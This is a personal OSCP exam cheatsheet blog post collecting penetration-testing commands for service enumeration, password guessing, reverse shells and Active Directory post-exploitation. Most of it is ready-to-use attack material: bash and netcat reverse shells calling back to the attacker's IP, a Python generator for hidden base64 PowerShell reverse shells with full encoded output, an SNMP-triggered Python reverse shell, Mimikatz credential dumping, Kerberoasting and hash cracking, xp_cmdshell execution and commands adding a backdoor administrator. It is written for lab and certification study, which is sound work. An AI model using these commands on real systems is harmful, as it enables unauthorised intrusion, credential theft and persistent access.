Home Technology My OSCP Pentesting Cheatsheet
Technology

My OSCP Pentesting Cheatsheet

Key Points

My OSCP Pentesting Cheatsheet I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation, that I had passed the OSCP exam! This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post, I can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post exploitation that can be useful for penetration...

My OSCP Pentesting Cheatsheet I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation, that I had passed the OSCP exam! This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post, I can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post exploitation that can be useful for penetration testing and the OSCP exam. Some useful Tips .env file I created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an .env file in each of these directories and stored useful environment variables such as $TARGET_IP and $TARGET_DOMAIN in them: 1 2 export TARGET_IP="10.10.10.11" export TARGET_DOMAIN="hackerask.com" Then I could simply source the .env file whenever I wanted to work on this machine: 1 source .env This is especially useful when you are working with multiple terminal tabs. You can also use this file to store other environment variables that you use frequently, such as credentials or to run scripts, such as starting a terminal logger. $myip environment variable I found it quite useful to have my IP address in a $myip environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the tun0 network interface to see our local VPN IP address. We can look at it with ifconfig tun0 or ip addr show tun0 . To avoid having to type in the IP address every time I need it, I created a $myip environment variable that looks like this: 1 export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1) We can add the export line to our .bashrc or .zshrc and then source the file, to be able to use the environment variable: 1 2 3 $ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" /bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1 This will output the reverse shell payload with our IP address of the tun0 network interface. Copy Alias I often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy copy alias to pipe the output of an command into the clipboard. I decided to use xclip , which can be installed with apt : 1 sudo apt install xclip To create the alias, we can add the following line to the .bashrc or .zshrc file: 1 alias copy='xclip -selection clipboard' And then restart the terminal session or source the file to be able to use it. We can use the copy alias, by appending it with a pipe: 1 echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy This will pipe the output of the echo command, the reverse-shell payload, to our clipboard. Tmux You should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between various tabs with easy keyboard shortcuts. Tmux Cheat Sheet & Quick Reference Network Enumeration General Host Discovery 1 2 3 nmap -sn 192.168.178.1-254 -vv -oA hosts cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' ' If nmap does not work, we can also try to ping the hosts: 1 for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1|grep "icmp_seq=1"|cut -f4 -d ' '|tr ':' ' '; done Port Scanning My first step is usually to scan the machine quickly with nmap for open TCP ports: 1 $ sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt Then I can use the following command to get all ports comma separated as output: 1 $ cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /' Then we can use the open ports to do a more detailed version scan: 1 $ nmap -p -sC -sV -oA enum/nmap/resource $TARGET_IP After scanning the TCP ports, we should not forget to scan for UDP ports as well: 1 $ sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp TCP 21 - FTP Anonymous Login: 1 ftp ftp://anonymous:anonymous@$TARGET_IP Banner grabbing: 1 nc -vn $TARGET_IP 21 Download all files: 1 2 wget -m ftp://anonymous:anonymous@$TARGET_IP wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/ Brutefoce: 1 hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp 22 - SSH Nmap: 1 2 3 4 5 # Check Authentication Methods: nmap -p22 $TARGET_IP --script ssh-auth-methods --script-args="ssh.user=root" # Retrieve Version nmap -p22 $TARGET_IP -sV Brutefoce: 1 hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh 23 - Telnet Banner Grabbing: 1 nc -vn $TARGET_IP 23 Nmap Enumeration: 1 nmap -n -sV -Pn --script "*telnet* and safe" -p 23 $TARGET_IP The script telnet-ntlm-info.nse can obtain NTLM info. 25,465,587 - SMTP Banner Grabbing: 1 2 3 $ rlwrap nc -vn $TARGET_IP 25 HELO AUTH Nmap: 1 2 nmap -p25 --script smtp* -v $TARGET_IP # smpt-commands smtp-enum-users smtp-open-relay Send Emails: 1 sudo swaks -t [email protected] --from [email protected] --server $TARGET_IP --header "Subject: TEXT" --body @body.txt --attach @file.pdf --suppress-data -ap 53 - DNS Try zone transfer: 1 2 dig axfr @$TARGET_IP dig axfr @$TARGET_IP $TARGET_DOMAIN Get more information: 1 dig ANY @$TARGET_IP $TARGET_DOMAIN 79 - finger We can use finger-user-enum.pl to enumerate users: 1 2 3 $ perl ~/hacking/scripts/kali/finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t $TARGET_IP > finger_enum_log.txt $ cat finger_enum_log.txt | grep -v "is not known" | grep "Login:" | cut -f3 -d ' ' 80,443 - HTTP 1 2 3 4 5 6 7 gobuster dir -u "http://$TARGET_IP/" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -o enum/web/80-gobuster.txt gobuster dir -u "http://$TARGET_IP/" -w /usr/share/wordlists/dirb/big.txt -o enum/web/80-gobuster.txt dirsearch -u http://$TARGET_IP -r -o enum/web/80-dirsearch.txt feroxbuster --url http://$TARGET_IP Wordpress Scanner: 1 2 wpscan --url http://$TARGET_IP -e ap,t,tt,u # Enumerate: -e with ap: All plugins, t: Popular Themes, tt: Timthumbs and u:User IDs range 1-10 Serve Webdav: 1 cadaver http://$TARGET_IP Nikto Web Vulnerability Scanning: 1 nikto -host=http://$TARGET_IP -output=enum/web/80-nikto.txt API Testing: 1 2 3 4 5 6 7 8 9 10 # This is a example from the PG Machine Hetemit # [Werkzeug httpd 1.0.1 (Python 3.6.8) Server] $ curl -i http://192.168.143.117:50000/verify -X POST --data "code=asdf" Internal Server Error $ curl -i http://192.168.143.117:50000/verify -X POST --data "code=5*5" 25 $ curl -i http://192.168.143.117:50000/verify -X POST --data "code=__import__('os').popen('whoami').read()" username /etc/hosts : 1 echo "$TARGET_IP\t$TARGET_DOMAIN" | copy IIS Shortnames](../../techniques/iis-shortname.md: Some IIS Server are vulnerable to IIS tilde / shortname enumeration. IIS-ShortName-Scanner: 1 2 3 4 5 $ git clone [email protected]:irsdl/IIS-ShortName-Scanner.git $ cd IIS-ShortName-Scanner/Docker/ $ docker build . -t shortname $ docker run shortname 2 20 http://$TARGET_IP Basic php webshell: 1 echo '' > shell.php 88 - Kerberos Authentication Not much here todo. You can just try bruteforcing: 1 nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$TARGET_DOMAIN",userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt $TARGET_IP Try to get service tickets: (Username/Password required): 1 sudo impacket-GetUserSPNs -request -dc-ip / 110,995 - POP Enumeration: 1 2 3 4 nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110,995 $TARGET_IP # Just execute all POP scripts nmap --script pop* -sV -p 110,995 $TARGET_IP Interacting with pop: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 # Syntax POP commands: USER uid Log in as "uid" PASS password Substitue "password" for your actual password STAT List number of messages, total mailbox size LIST List messages and sizes RETR n Show message n DELE n Mark message n for deletion RSET Undo any changes QUIT Logout (expunges messages if no RSET) TOP msg n Show first n lines of message number msg CAPA Get capabilities # Command $ rlwrap nc -vn $TARGET_IP 110 User jonas +OK PASS password +OK Welcome jonas LIST +OK 2 1807 1 786 2 1021 retr 1 .... 135,593 - MSRPC Nmap: 1 nmap --script msrpc-enum -p 135 $TARGET_IP Rpcdump: 1 impacket-rpcdump -port 135 $TARGET_IP | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR' MS-EFSRPC : It might be vulnerable to PetitPotam.MS-RPRN ,MS-PAR : It might be vulnerable to PrintNightmare (PoC) RPC Client: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 # Anonymous logon: rpcclient -N -U '' -p 135 $TARGET_IP # -k : Kerberos Authentication rpcclient -k $TARGET_IP # --- Commands --- # Server info rpcclient $> srvinfo # Enumerate domains rpcclient $> enumdomains # Enumerate domain users rpcclient $> enumdomusers # Enumerate domain groups rpcclient $> enumdomgroups # Domain info rpcclient $> querydominfo # Current username rpcclient $> getusername If we have valid user credentials we can connect with rpcclient and enumerate groups and users: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ rpcclient -U /% $TARGET_IP > enumdomgroups > enumdomusers > querygroupmem > queryusergroups # We can try to modify account information with setuserinfo # The level parameter referse to the level of detail we want to modify user account data # 0: Basic information, username,fullname # 1: Additional information, home directory, script path, profile path # 2: Further information, password age, privileges, logon script # 3: Detailed information, including all above and group membership # 4: Even more detailed, including all above and security identifier (SID) # To change a password we can use setuserinfo2, with a level of 2,3. > setuserinfo 23 '' 139,445 - SMB Null Session: 1 2 3 4 5 smbclient -N -L \\\\$TARGET_IP\\ nxc smb $TARGET_IP -u '' -p '' nxc smb $TARGET_IP -u '' -p '' --shares nxc smb $TARGET_IP -u '' -p '' --users SMB Login with “guest”: 1 2 3 impacket-smbclient zeus/guest@$TARGET_IP # or smbmap -H $TARGET_IP -u guest -d $TARGET_DOMAIN If we have credentials for a target but can only login with SMB, we can try to execute a command with it: 1 nxc smb $TARGET_IP -u -p -X 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AY...AKAApAA==' Enumerate Share: 1 2 3 4 5 6 7 8 9 smbclient "\\\\$TARGET_IP\\Share" -U 'domain\user' --password 'password' -c 'recurse;ls' # or smbmap -R -H $TARGET_IP # Download a file smbmap -R -H $TARGET_IP -A Groups.xml -q # Bruteforce RID nxc smb $TARGET_IP -u hazard -p stealth1agent --rid-brute Group Policy Preferences: (e.g. Groups.xml ) (e.g. HTB Querier - Cached GPP file) If we find in a share Group Policy Preferences (GPP), we can try to find credentials (often in xml files). If we find a xml file with a cpassword attribute, we can decrypt it with gpp-decrypt : 1 gpp-decrypt '' Overall Enumeration: 1 2 3 enum4linux $TARGET_IP nmap -p139,445 -sC -sV --script smb-vuln* $TARGET_IP If valid credentials are found, you can try to add the user to the “Remote Access” group: 1 net rpc group addmem "Remote Access" "" -U "%" -S $TARGET_IP 143,993 - IMAP Bruteforce Logins: 1 $ hydra -L users.txt -P custom-wordlist.txt -f $TARGET_IP imap Interacting with pop: 1 2 3 4 5 # List all messages in Mailbox $ curl -k "imap://$TARGET_IP/INBOX?ALL" --user name:password # View Email $ curl -k "imap://$TARGET_IP/INBOX;UID=2" --user name:password 389,636,3268,3269 - LDAP We can try to search and access LDAP: 1 2 3 4 ldapsearch -H ldap://$TARGET_IP -x -b"DC=,DC=" > enum/ldap_dump.txt nxc ldap $TARGET_IP -u '' -p '' -M get-desc-users nxc ldap $TARGET_IP -u '' -p '' --password-not-required --admin-count --users --groups Enumerate domain objects: 1 2 3 4 5 $ ./windapsearch.py -d $TARGET_DOMAIN --dc-ip $TARGET_IP -U # or $ impacket-GetADUsers $TARGET_DOMAIN/ -dc-ip $TARGET_IP -debug LAPS (Local Administrator Password Solution): 1 2 3 4 5 nxc ldap $TARGET_IP -d 'domain' -u 'username' -p 'password' --kdcHost $TARGET_IP -M laps ~/hacking/scripts/kali/pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" --dc-ip $TARGET_IP ldapsearch -v -c -D [email protected] -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://$IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 1433 - MSSQL Nmap Enumeration: 1 nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $TARGET_IP If you have windows credentials (e.g. from kerberosting), you have to use -windows-auth 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ impacket-mssqlclient sql_svc:Dolphin1@$TARGET_IP -windows-auth # How to execute commands: enable_xp_cmdshell; RECONFIGURE; # or EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; # Execute commands: xp_cmdshell whoami xp_cmdshell 'powershell -e ' 1 $ nxc mssql $TARGET_IP -u user.txt -p pass.txt Once access to MSSQL, we can ty to use xp_dirtree to make a request to a share and can try to catch the request with responder: 1 2 3 4 5 # SQL: xp_dirtree \\$myip\share # Responder sudo responder -I tun0 --verbose Useful MSSQL Queries: 1 2 3 4 5 -- List Databases SELECT name FROM master..sysdatabases; -- List Tables: SELECT name FROM msdb..sysobjects WHERE xtype = 'U'; 1978,9099 - Mouse Exploits Port 1978: (WiFi Mouse 1.7.8.5) - Exploit-DB: https://www.exploit-db.com/exploits/49601 Port 9099: (Mobile Mouse 3.6.0.4) - Exploit-DB: https://www.exploit-db.com/exploits/51010 3306 - MySQL Connect to a MySQL database: 1 2 # It will ask for a password mysql -u root -p Useful MySQL commands: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 show databases; use ; connect ; show tables; describe ; show columns from ; select version(); select @@version(); select user(); select database(); -- Get a shell with the mysql client user \! sh -- Basic MySQLi Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables Union Select 1,2,3,4,column_name from information_schema.columns where table_name="" -- Read & Write ---- Yo need FILE privilege to read & write to files. select load_file('/var/lib/mysql-files/key.txt'); # -- Read file select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php' -- Try to change MySQL root password UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root'; UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root'; FLUSH PRIVILEGES; quit; 5432 - PostgreSQL Remote Connection: 1 psql -h -p -U -W 1 2 3 4 5 6 7 8 -- List users \du -- Execute Commands DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM ''; SELECT * FROM cmd_exec; 5800,5801,5900,5901 - VNC Decrypt VNC passwords: 1 $ echo -n "6b,cf,2a,4b,6e,5a,ca,0f" | sed 's/,//g' | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d 6379 - Redis Connect: 1 redis-cli -h $TARGET_IP$ Commands: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 # get all the infos config get * # get the stored keys keys * # obtain value from keys get # when passwordless authentication is available we can write files with redis # change the working directory config set dir # name of the file you want to save config set dbfilename test.php # contents to be stored in test.php # set keyName value set dnoscp '' # create the file test.php with the contents save # get all the stored keys keys * # get values from the key dump # delete key del UDP 123 - NTP Synchronize Watches: 1 sudo ntpdate $IP Enumeration: 1 nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 $TARGET_IP 161,162,10161,10162 - SNMP Nmap: 1 2 3 sudo nmap -sU -p 161 --script snmp-* $TARGET_IP -oG enum/nmap/snmp.txt # snmp-info - SNMP Information # snmp-brute - Bruteforce valid credentials Bruteforce Community Strings: 1 2 3 4 5 6 7 $ nmap -sU -p 161 --script snmp-brute $TARGET_IP --script-args snmp-brute.communitiesdb=/usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $TARGET_IP $ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET_IP snmp $ python3 ~/hacking/scripts/kali/scripts/snmpbrute.py -t $TARGET_IP -f /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt SNMP Enumeration: 1 snmp-check -c $TARGET_IP Get Useful Information: 1 2 3 4 5 6 7 8 # Collect data $ snmpbulkwalk -c public -v2c $TARGET_IP . | tee -a enum/bulk-snmp # Display SNMP Names based on how often they show up $ grep -oP '::.*?\.' enum/bulk-snmp | sort | uniq -c | sort -n # Check for running software and its parameters $ grep hrSWRun enum/bulk-snmp| less Reverse Shell: 1 2 3 4 sudo apt install snmp snmp-mibs-downloader rlwrap -y git clone https://github.com/mxrch/snmp-shell cd snmp-shell sudo python3 -m pip install -r requirements.txt 1 snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 $TARGET_IP 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"192.168.45.197\",5555));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"' Trigger it: 1 snmpwalk -v 2c -c public $TARGET_IP nsExtendObjects Password Guessing - Always try product/manufacturer name as user/password - If a Name is found try upper/lowercase, email etc. - Try always name:name as password (uppercase/lowercase) - John Doe becomes: john ,John ,johnd ,jdoe ,john.doe ,j.doe ,jd - Use cewl to create a custom wordlist - Use CUPP For usernames we can use Username Anarchy to generate usernames: 1 2 ./username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > users-generated.txt Reverse Shells Base64 encoded Powershell Reverse Shell On Windows targets, I often use a base64-encoded Powershell reverse shell to gain initial access to a system. To avoid having to manually edit and encode the reverse shell or use websites like revshells.com, I wrote this Python script to generate the encoded reverse shell with a single command: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import sys import base64 if len(sys.argv) < 2: print("usage:", sys.argv[0], " []") exit(0) ip = sys.argv[1] port = "5555" if len(sys.argv) == 3: port = sys.argv[2] payload = '$client = New-Object System.Net.Sockets.TCPClient("'+ip+'",'+port+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() print(cmd) We can then run the script to generate a base64-encoded Powershell reverse shell: 1 2 3 $ python3 powershell_rev.py $myip 5555 powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEANwA4AC4AMQAwACIALAA1ADUANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== If the reverse shell is not working If the common reverse shells are not working, you can try to use a named pipe based reverse shell: 1 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $myip 5555 >/tmp/f Often this reverse shell is quite reliable and will start a shell. But if you still do not get a shell, you can try using common ports like 21 , 22 , 80 , etc. (Maybe a firewall is blocking connections from other ports). Active Directory and Windows Post-Exploitation Mimikatz 1 2 3 4 5 $ curl.exe -o mt.zip http://$LOCAL_IP/mimikatz_trunk.zip $ Expand-Archive -LiteralPath mimikatz_trunk.zip $ .\mimikatz_trunk\x64\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::msv" "lsadump::sam" "exit" Ligolo On the Kali machine, I started the proxy: 1 sudo ./ligolo-proxy -selfcert Then we can start the ligolo-agent on the target machine: 1 $ ./ligolo-agent -connect 192.168.178.10:11601 -ignore-cert Then in the ligolo-proxy shell I entered the following commands: 1 2 3 4 5 6 7 8 9 $ interface_create --name "oscp" $ session $ tunnel_start --tun oscp $ ifconfig $ interface_add_route --name oscp --route 10.10.10.0/24 Now we can use another terminal tab and access the 10.10.10.0/24 internal network. Reverse Shell listener in ligolo: 1 listener_add --addr 0.0.0.0:5656 --to 127.0.0.1:4444 --tcp Transfer Files with the following listener: 1 listener_add --addr 0.0.0.0:2222 --to 127.0.0.1:8888 --tcp Kerberoasting (User must have: DONT_REQUIRE_PREAUTH ) 1 sudo impacket-GetUserSPNs -request -dc-ip $TARGET_IP $TARGET_DOMAIN/ Try it without a password with a list of usernames: 1 impacket-GetUserSPNs $TARGET_DOMAIN/ -usersfile users.txt --no-pass -outputfile kerberoast.hash -dc-ip $TARGET_IP Crack the hashes: 1 sudo hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt --force AS-Rep Roasting 1 impacket-GetNPUsers -dc-ip $TARGET_IP -request $TARGET_DOMAIN/ Try it without a password with a list of usernames: 1 impacket-GetNPUsers $TARGET_DOMAIN/ -usersfile users.txt --no-pass -outputfile asreproast.hash -dc-ip $TARGET_IP Crack the hashes: 1 sudo hashcat -m 18200 asreproast.hash /usr/share/wordlists/rockyou.txt --force Transfer Files Typical ways I use: 1 2 3 curl http://$LOCAL_IP/file.exe -o file.exe wget http://$LOCAL_IP/file.exe -O file.exe If wget and curl does not work: 1 2 3 4 iwr -Uri "http://$LOCAL_IP/file.exe" -OutFile file.exe certutil -urlcache -f http://$LOCAL_IP/file.exe file.exe certutil -urlcache -split -f http://$LOCAL_IP/file.exe file.exe Netcat Upload/Download file: 1 2 3 4 # Listener nc -q 0 -lvp 443 > file # Send File nc -nv IP_ADDR 443 < file SMB Server: 1 2 3 4 5 6 # SMB Server impacket-smbserver share ~/Downloads/smb -smb2support -username smb -password pass net use \\$LOCAL_IP\share /u:smb pass copy file.txt \\$LOCAL_IP\share\ net use /d \\$LOCAL_IP\share Add User and Permissions Add admin user (with RDP and WinRM permissions): 1 2 net user attacker attacker /add net localgroup Administrators attacker /add Add rdp permissions with nxc : 1 netexec smb $TARGET_IP -u administrator -p pass123 -M rdp -o ACTION=enable Add winrm permissions: 1 net localgroup "Remote Management Users" attacker /add Add rdp permissions: 1 net localgroup "Remote Desktop Users" attacker /add Set Execution Policy on the Machine to bypass : 1 Set-ExecutionPolicy Bypass -Scope LocalMachine Resources Collections of useful information: Useful Tools: Useful Proving Grounds and HackTheBox machine lists:
OSCP (ORG) Active Directory (ORG) Tips (PERSON) tun0 (ORG) addr show tun0 (PERSON) IP (ORG)
Originally published by Hacker News Read original →